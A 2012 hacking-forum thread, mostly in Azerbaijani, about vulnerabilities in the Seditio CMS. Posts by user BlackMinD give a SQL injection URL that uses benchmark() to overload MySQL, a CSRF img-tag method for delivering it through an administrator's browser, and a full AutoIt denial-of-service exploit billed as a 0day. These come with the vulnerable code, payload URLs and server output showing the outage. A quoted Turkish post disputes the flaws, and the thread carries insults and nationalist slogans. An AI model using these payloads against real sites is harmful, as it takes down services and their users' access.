Overload MYSQL serverAs result Mysql Server Goes Down+High CPU Load in other words: Create Denial Of Service throught sql injection)
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--
Note: It can be mixed with CSRF especially if you have no any access to system as admin.
In eg:
<img src="http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--" />
burda step bildirmisən adi iframe ilə admini səhifəyə yönləndirərək denial of service mysql yüklənmə ))))
Ən cazibədar vuln bu oldu

Anti-armenia.ORG

Istifadəçi

2012-04-13 02:15 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

Siz də sağ olun
@2. SFQuick Ban əlavəsi, istəyə bağlı olaraq kullanımdadır.
Məsləhət görməzdim çünki CSRF-lidir söhbət yoxki istifadə edən vulnerable olacaq və bundan istifadə edərək başqa userləri admini də ban etmək olur.
Vaxtım olsa onun üçün anticsrf reallaşdıraram elə seditionun öz sed_xg() funksiyası kifayət edir.
Gərək CSRF-i mütləq fixlənsinki rahatlıq olsun admində də.
Bir tərəfdən də özünüz baxın əksər pluginlər 2007-nindir yəni outdated.VƏ dəstəklənmir yazarları tərəfindən.
İstifadədən öncə məsləhət görərdim bugtracklara baxmaq.Həm də lazımsız çox plugin lazım deyil İMO istifadə etmək.Hansı lazımsızdır fiziki səviyyədə saytdan pozun bəs edir.
@3. PM Okuma əlavəsi, istəyə bağlı olaraq kullanımdadır. (Illa bunu işlətmək istəyirəm deyirsinizsə qısa yoldan pmoku əlavəsinin fayllarına chmod 444 verə bilərsiniz.)
Adi htmlentities() vəssalam.chmod 444 verməyin mənası yoxdur çünki burda XSS yəni client side vulndur.
@4 Razıyam.Amma baxır hansı vulnlarda.Server configurasiyanın da rolu var amma onu da yaddan çıxartmayaq ki,bacarıqlı adam əlində 99% halda bu vulnlar universal şəkilə gətirilə bilər və server configurasiyadan asılı olmadan işləyə bilər.
@5 də isə çünki testdə səhvə yol vermisən.Orda maxlength=64 sən onu normal brauzerdən edə bilməzsən çünki brauzer qoymur o limiti keçəsən amma attacker onu 2 saniyəyə edə bilər məsələn Minibrowserlə.
&x= orda anticsrf tokendir onu post etmə və cari istifadə etdiyin &x istifadə et.Gör necə expose edəcək.Wrong input ona görə deyibki &x burda göstəriləni istifadə etmisən ehtiyyac yoxdur ona öz current sessiyandakı &x istifadə et + minibrauzerlə et həmin nətcəni alacaqsan.
Loru dildə desək həmin expose nədir?
mysql_query("SELECT BLA BLA from BLA2 etc...") or die(mysql_error());
Onu da səhv eləmirəmsə elə sed_sql_query() adlanan funksiyadan mysql_error() -u yığışdırıb redirect vermək olar indexə beləliklə expose-a son.

Virtualbox sönülüdür indi çəkib print verərdim(biraz yorğunam sorry həvəs yoxdur)

Siz də sağolun.

P.S seditio chat pluginində də eyni qaydada CSRF var təhlükli deyil əksinə funnydır)(Mırtlaşmaq üçün)
http://packetstormsecurity.org/files/111757/Seditio-Chat-1.0-Cross-Site-Request-Forgery.html

Ana VƏTƏN!

Anti-armenia.ORG

Istifadəçi

2012-04-13 08:39 GMT

CwGhost

VIP

Mesaj Sayı : 160

Mövzu Sayı :

Rep Ver :

Rep Sayı : 4

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : Baku

Ölkə :

Məslək : CwGhost

Yaş :

Mesaj :

təşəkkürlər

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png

Anti-armenia.ORG

Istifadəçi

2012-04-13 11:51 GMT

XEY

VIP

Mesaj Sayı : 33

Mövzu Sayı :

Rep Ver :

Rep Sayı : 0

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək : xey

Yaş :

Mesaj :

TheRock qəşəngsən!

No Kids No Hack

Anti-armenia.ORG

Istifadəçi

2012-04-14 00:05 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

))))
Yadıvızda saxlayın)
Kaan TRUE STYLE TROLLY VƏ noobdur)
Əminəmki onun "editlədiyi" seditio ümumiyyətlə vulnlarla doludur)
Proof: bu adam vuln nədir bilmir.Bu da azmış kimi lezvadır))))))
Onun htmlspecialchars() dan istifadəsində bunu görə bilərsiniz)))))))))
Print screen də verirəm sonra kimsə inciməsin)))))
[img]

Görürəm yaman nanay-nanay eliyir vuln yoxdur onda soxsun gözünə2si də var privatedir xüsusəndə belə nooblara vurmaq üçün.0Day etmiyəcəyəm)

http://packetstormsecurity.org/files/111814/seditio170-sqlxsrf.txt

http://seditio-eklenti.com/seditio-sql-injection-hakkinda-bilgilendirme-m1888.html

Tak şto xüsusilə seditio servərlərə bad news:Kaan noobdur.
Mənim tapdığım vulnlar vuln olmasaydı dünyaca məşhur saytlarda dərc edilməzdi!Çünki yoxlanılır hamısı lab şəraitində.
Noobdun yazısını copy/paste edirəm getdi tarixə))))

Kod:
[img]http://s019.radikal.ru/i607/1204/e1/18fec897ca05.png[/img]
http://seditio-eklenti.com/seditio-sql-injection-hakkinda-bilgilendirme-m1888.html

Seditio Sql Injection

Son zamanlarda Seditio Hakkında çıkan SQL Injection açıkları ile ilgili bu yazıyı yazma gereği duydum.
Seditio'da şuanda hiç bir Sql Injection Açığı yoktur bunu bilmelisiniz.
Bilinen veya var oldugunu idda edenler gereksiz yere Seditio Kullanıcılarını Teretdüt içinde bırakmaktadırlar.
Şimdi sizlere var olduğu idda edilen açıklar hakkında gerekli bilgileri vericem sırasıyla.

1.Users.php
İlgili Konu: http://seditio-eklenti.com/sedit.....1845.html
Bu bir açık değildir öncelikle bunu bilmelisiniz.

Açıklama: Seditio'da Tanımlanmış olan $s değişkeni farklı şekilde çagrıldıgı zaman hata vericektir.
Yapılan işlemde hata veriyor görüldüğü gibi hatayı ekrana yazdırmak için yardımcı kod devreye giriyor burada ve hatayı sizin görmenizi saglıyor. Bu bir Sql açığı değildir Tanımlı olan kodun dışında farklı kod çagrıldıgında doğal olarak sistem hata vericektir SQL'de olmayan bir şeyi aradıgınızda.
Biz ne yaptık FİX'de Hatayı ekrana yazdırmasını önledik başka bişey yapmadık hata devam ediyor sadece kullanıcı göremiyor.

2. $get['w'] ve diğerleri
İlgili Konu: http://seditio-eklenti.com/sedit.....1880.html

Açıklama: Burada da yukarıda anlattıgım olayın aynısı geçerlidir ilgili değişkenler sisteme tanımlı oldugu için tanımlanmamış bir şekilde çagrıldıgında hata veriyor Her hangi bir SQL İnjection açığı değildir.
İlgili Yamada yine ne yaptık hatanın ekrana basılmasını önledik sadece.

3. PM Okuma Plugin
İlgili Konu: http://seditio-eklenti.com/sedit.....1884.html

Açıklama: Eklentide açık vardır fakatsorun teşkil etmez kesinlikle sadece admin gördüğü için her hangi bir risk yoktur.
Eklentideki sorun giderilebilir.
Çözüm:
Kod:
$plugin_body .= "<td>$pm_title</td>";
$plugin_body .= "<td>$pm_text</td>";

Alttaki şekilde Değiştirin.
Kod:
$plugin_body .= "<td>htmlspecialchars($pm_title)</td>";
$plugin_body .= "<td>htmlspecialchars($pm_text)</td>";

Veya bu Şekilde
Kod:
$plugin_body .= "<td>sed_cc($pm_title)</td>";
$plugin_body .= "<td>sed_cc($pm_text)</td>";

4. DBTools Güvenlik Sorunu
İlgili Konu: http://seditio-eklenti.com/sedit.....1886.html

Açıklama: Böyle Bir sorun veya açık kesinlikle yoktur.
Burada yapılan işlem Admini Kandırmaktır sadece başka bir şey söz konusu değildirki sadece bu eklenti ile ilgili bişey değil orda yapılan bir konu linkinide aynı şekilde yapabilirsiniz ve admin o konuyu siler görmeden Bu Sadece Seditio İçin Geçerli değildir TÜM CMS FORUM sistemleri için aynı şey yapılabilir açık söz konusu değildir dediğim gibi sadece Admini Kandırma oyunudur.

5. Chat Plugin Güvenlik Sorunu
İlgili Konu: http://seditio-eklenti.com/sedit.....1887.html

Açıklama: Buda aynı DbTools gibi Admini kandırma işlemi ile yapılan bir şey her hangi bir açık teşkil etmiyor.

Bunların Dışında şuan bilinen bişey yok yada ben bilmiyorum.

SEDİTİO KULLANICILARI HİÇ BİR ŞEKİLDE ENDİŞE ETMESİN GÜVENLİK AÇIĞI YOKTUR SADECE ETRAFTA DEDİKODU YAPIP İNSANLARIN BEYNİNİ BULANDIRIYORLAR O KADAR HİÇ KİMSEYE İTİBAR ETMEYİNİZ BU KONULAR HAKKINDA.

Sormak istedikleriniz veya bilmemiz gerekenler varsa lütfen yazınız.
Bi Dünya Müzik: http://bdmfan.com
Seditio'da Açık var Diye DEDİKODU Yapanlara İnanmayın.
Seditio Şimdi Daha Güvenli ve Daha Hızlı Gücünü Hissedin.

Sormak istedikleriniz veya bilmemiz gerekenler varsa lütfen yazınız.
Bi Dünya Müzik: http://bdmfan.com
Seditio'da Açık var Diye DEDİKODU Yapanlara İnanmayın.
Seditio Şimdi Daha Güvenli ve Daha Hızlı Gücünü Hissedin.[/code]

Ana VƏTƏN!

Anti-armenia.ORG

Istifadəçi

2012-04-14 13:55 GMT

PuN!Sh3r

Gold

Mesaj Sayı : 308

Mövzu Sayı :

Rep Ver :

Rep Sayı : 35

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : W00t W00t

Ölkə :

Məslək : Cyber Security Specialist

Yaş :

Mesaj :

söhbətə bax error verir amma sql inj deyil
step iynəsini niyə vurmursan? aglını başına yiğsın bəlkə ağıllanar

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..

Anti-armenia.ORG

Istifadəçi

2012-04-14 17:46 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

Onun iynəsi vurulub da day nəyini vuraq)

Next 0day (exploit http://pastebin.com/HWqYxsiR)

Kod:
#cs
Seditio 165 (noob Kaan's edition from seditio-eklenti.com)
Denial Of Service exploit by AkaStep.
We will exploit Sql injection using this exploit and as result we will cause Denial of Service.
Mysql server will go down or will overloaded +server will get overloaded(High CPU Load).
// Vuln Discovered By AkaStep + exploit By AkaStep.
Enjoyyyyy)
NOTES: Do not login to target site otherwise it will fail exploit it vuln.
Exploit Coded in Autoit.See autoitscript.com

Details about Vuln:(Magic_Quotes_gpc=off)

//seditio165 from seditio-eklenti.com [Noob Kaan edition)))))))] [Usefull for Denial of service -Sql injection]
//magic_quotes_gpc =off
//system/common.php
// 0day by AkaStep
[code]
//Vulnerable code section
if (($rd_loc != "users.php")&&($rd_loc != "message.php"))
{

$sql_update_online = sed_sql_query("UPDATE sed_redirecter SET rd_location='".$rd_loc.$rd_extra."',rd_lastseen='".time()."' WHERE rd_ip='".$_SERVER["REMOTE_ADDR"]."'");
}
/14 April 2012

#ce

$targetsite="http://192.168.0.15:80/learn/128/sed/seditio165/"; //target site. Change it to target site.

#cs
DO NOT TOUCH ANYTHING BELOW

#ce

$exploit=$targetsite & "/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='" & @IPAddress1 & "',rd_lastseen='"; //Our exploit.
$first=$targetsite & '/forums.php'; // our 1'st request will go here.

HttpSetUserAgent("I'm Denial Of Service Exploit for Seditio 165 throught sql injection"); //setting user agent 4 fun
InetGet($first,'',1);// first request.After this our IP address will be inserted to table sed_redirecter.It is neccessary to exploit.
Sleep(1500); //sleeping 1.5 second (*Waiting operation*)
HttpSetUserAgent("Exploiting!!!!");//setting our user agent again 4 fun.
InetGet($exploit,'',1,1) ; Now exploiting it with *do not wait* responce option.Until now We exploiting sql injection and causing Denial Of Service.
Exit; //exit from exploit

#cs

Here is how this process looks like from server's mysql:
worker.com is my own locally spoofed "site" it is not real site anymore.And it is nothing does in this case.

mysql> show full processlist \G
*************************** 4. row ***************************
Id: 5
User: sed165
Host: worker.com:1632
db: sed165
Command: Query
Time: 411
State: Updating
Info: UPDATE sed_redirecter SET rd_location='plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))
),rd_ip='192.168.0.1',rd_lastseen='',rd_lastseen='1334411851' WHERE rd_ip='192.168.0.1'
*************************** 5. row ***************************
Id: 6
User: root
Host: localhost:2658
db: sed165
Command: Query
Time: 0
State: NULL
Info: show full processlist
*************************** 6. row ***************************
Id: 7
User: sed165
Host: worker.com:1633
db: sed165
Command: Query
Time: 69
State: Waiting for table level lock
Info: UPDATE sed_redirecter SET rd_location='forums.php',rd_lastseen='1334412192' WHERE rd_ip='192.168.0.1'
6 rows in set (0.00 sec)

mysql>

#ce

Kod:
//seditio165 from seditio-eklenti.com [Noob Kaan edition)))))))] [Usefull for Denial of service -Sql injection]
//magic_quotes_gpc =off
//system/common.php
// 0day by AkaStep

//Vulnerable code section
if (($rd_loc != "users.php")&&($rd_loc != "message.php"))
{

$sql_update_online = sed_sql_query("UPDATE sed_redirecter SET rd_location='".$rd_loc.$rd_extra."',rd_lastseen='".time()."' WHERE rd_ip='".$_SERVER["REMOTE_ADDR"]."'");
}

Exploit:
First do any HTTP $_GET request to target site.domain/forums.php in example http GET http://site.com/forums.php
Then exploit: where rd_ip='192.168.0.1' your IP address (Use minibrowser or mix it with Autoit)
[url]http://192.168.0.15:80/learn/128/sed/seditio165/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='192.168.0.1',rd_lastseen='[/url]

Kod:
mysql> show full processlist \G
*************************** 7. row ***************************
Id: 1203
User: sed165
Host: 192.168.0.1:1472
db: sed165
Command: Query
Time: 915 // <------------915 saniyedirki davam edir))
State: Updating
Info: UPDATE sed_redirecter SET rd_location='plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now()))))
,rd_ip='192.168.0.1',rd_lastseen='1',rd_lastseen='1334404098' WHERE rd_ip='192.168.0.1'
7 rows in set (0.00 sec)

mysql> select 915/60 \g
+---------+
| 915/60 |
+---------+
| 15.2500 |
+---------+
1 row in set (0.00 sec)
//~ 15 deqiqedirki davam edir.

mysql> select * from sed_redirecter \g

Cavab yoxdur MYSQL serverden.

HTTP RESPONCE:

Kod:
cmd> GET /learn/128/sed/seditio165/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='192.168.0.1',rd_lastseen='1 HTTP/1.0
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd> Referer: http://192.168.0.15:80/learn/128/sed/seditio165/message.php?msg=930&redirect=L2xlYXJuLzEyOC9zZWQvc2VkaXRpbzE2NS9wbHVnLnBocD9lPXNpa2RpcicscmRfbG9jYXRpb249KHNlbGVjdCsxKSxyZF9pcD0nT3duZWQnLHJkX2xhc3RzZWVuPScxMjMnPScx
cmd> User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
cmd> Host: 192.168.0.15
cmd> Cookie: ASPX=7o818e5qfsgdbg9mljc00t0vhulfu9rp; SEDITIO=MDpfOjA6Xzo4eWVhcnM%3D
cmd>

Fikir verin HTTP status code yoxdur .Responce HTTP XXX olmalı idi hardakı XXX status code 200 olmalıdır.
Bizim halda isə yoxdur yəni downdadır server.
CPU intel Pentium 4 3.2 GHZ minimum CPU load during Denial Of service 63-65 % max 72 % (Necədü?)

Enjoyyy)))))

Ana VƏTƏN!

Anti-armenia.ORG